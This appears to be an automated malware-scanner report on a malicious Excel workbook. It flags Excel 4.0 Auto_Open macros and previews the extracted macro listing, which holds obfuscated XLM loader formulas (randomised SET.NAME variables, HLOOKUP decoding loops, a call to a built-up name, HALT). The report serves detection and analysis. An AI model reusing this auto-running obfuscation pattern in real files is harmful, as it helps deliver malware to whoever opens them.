MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6634 bytes |
SHA-256: e3b51926713d87d983ee4e480d06801c64534769c8c4abaffd7830840fcdf311 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - cRxK
' 0018 25 LABEL : Cell Value, String Constant - aSZpKGNNSE len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!E171
' 0018 26 LABEL : Cell Value, String Constant - BFyYkQunujm len=0
' 0018 27 LABEL : Cell Value, String Constant - BVLNRyMxfTSy len=0
' 0018 25 LABEL : Cell Value, String Constant - DGtRUNKkjQ len=0
' 0018 23 LABEL : Cell Value, String Constant - dONzErhc len=0
' 0018 24 LABEL : Cell Value, String Constant - dUjevmAxG len=0
' 0018 25 LABEL : Cell Value, String Constant - imerzvIQSV len=0
' 0018 27 LABEL : Cell Value, String Constant - JFKYeIPhodXI len=0
' 0018 24 LABEL : Cell Value, String Constant - kqjRVbUKq len=0
' 0018 25 LABEL : Cell Value, String Constant - nLSSipOPUZ len=0
' 0018 22 LABEL : Cell Value, String Constant - QINXRjH len=0
' 0018 27 LABEL : Cell Value, String Constant - qVZrexOKqivM len=0
' 0018 24 LABEL : Cell Value, String Constant - rnfXEpYWa len=0
' 0018 23 LABEL : Cell Value, String Constant - RYHnQPpG len=0
' 0018 20 LABEL : Cell Value, String Constant - stail len=0
' 0018 23 LABEL : Cell Value, String Constant - UeYSHfUX len=0
' 0018 22 LABEL : Cell Value, String Constant - uXHAMof len=0
' 0018 26 LABEL : Cell Value, String Constant - wJkpgwMNFsA len=0
' 0018 24 LABEL : Cell Value, String Constant - wkLzbccXX len=0
' 0018 24 LABEL : Cell Value, String Constant - YjQsnMUaA len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' cRxK,P48,"",-591.00000000000000000000
' cRxK,P49,"",-547.00000000000000000000
' cRxK,P50,"",488.00000000000000000000
' cRxK,P51,"",-992.00000000000000000000
' cRxK,P52,"",8.00000000000000000000
' cRxK,P53,"",661.00000000000000000000
' cRxK,E86,"SET.NAME("JFKYeIPhodXI",0+VALUE("0"))",""
' cRxK,E90,"SET.NAME("YjQsnMUaA",JFKYeIPhodXI)",""
' cRxK,E95,"SET.NAME("kqjRVbUKq",JFKYeIPhodXI)",""
' cRxK,E97,"SET.NAME("aSZpKGNNSE",COUNTA(RYHnQPpG))",""
' cRxK,E99,"SET.NAME("wJkpgwMNFsA",COUNTA(dONzErhc))",""
' cRxK,E103,[],""
' cRxK,E105,"SET.NAME("dUjevmAxG","")",""
' cRxK,E107,"YjQsnMUaA",""
' cRxK,E110,"SET.NAME("wkLzbccXX",HLOOKUP("*",RYHnQPpG,YjQsnMUaA,FALSE))",""
' cRxK,E112,"qVZrexOKqivM",""
' cRxK,E117,"SET.NAME("uXHAMof",JFKYeIPhodXI)",""
' cRxK,E122,[],""
' cRxK,E127,"uXHAMof",""
' cRxK,E132,"nLSSipOPUZ",""
' cRxK,E136,"DGtRUNKkjQ",""
' cRxK,E138,"QINXRjH",""
' cRxK,E143,"SET.NAME("stail",VALUE(HLOOKUP("*",dONzErhc,QINXRjH,FALSE)))",""
' cRxK,E146,"rnfXEpYWa",""
' cRxK,E148,"dUjevmAxG",""
' cRxK,E151,"kqjRVbUKq",""
' cRxK,E156,NEXT(),""
' cRxK,E159,"imerzvIQSV",""
' cRxK,E163,[],""
' cRxK,E165,"UeYSHfUX",""
' cRxK,E167,NEXT(),""
' cRxK,E169,RETURN(),""
' cRxK,E191,"SET.NAME("BFyYkQunujm",E86)",""
' cRxK,E195,"RYHnQPpG",""
' cRxK,E200,"SET.NAME("dONzErhc",R82C15)",""
' cRxK,E204,"SET.NAME("UeYSHfUX",211)",""
' cRxK,E208,"SET.NAME("BVLNRyMxfTSy",5)",""
' cRxK,E210,BFyYkQunujm(),""
' cRxK,E211,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.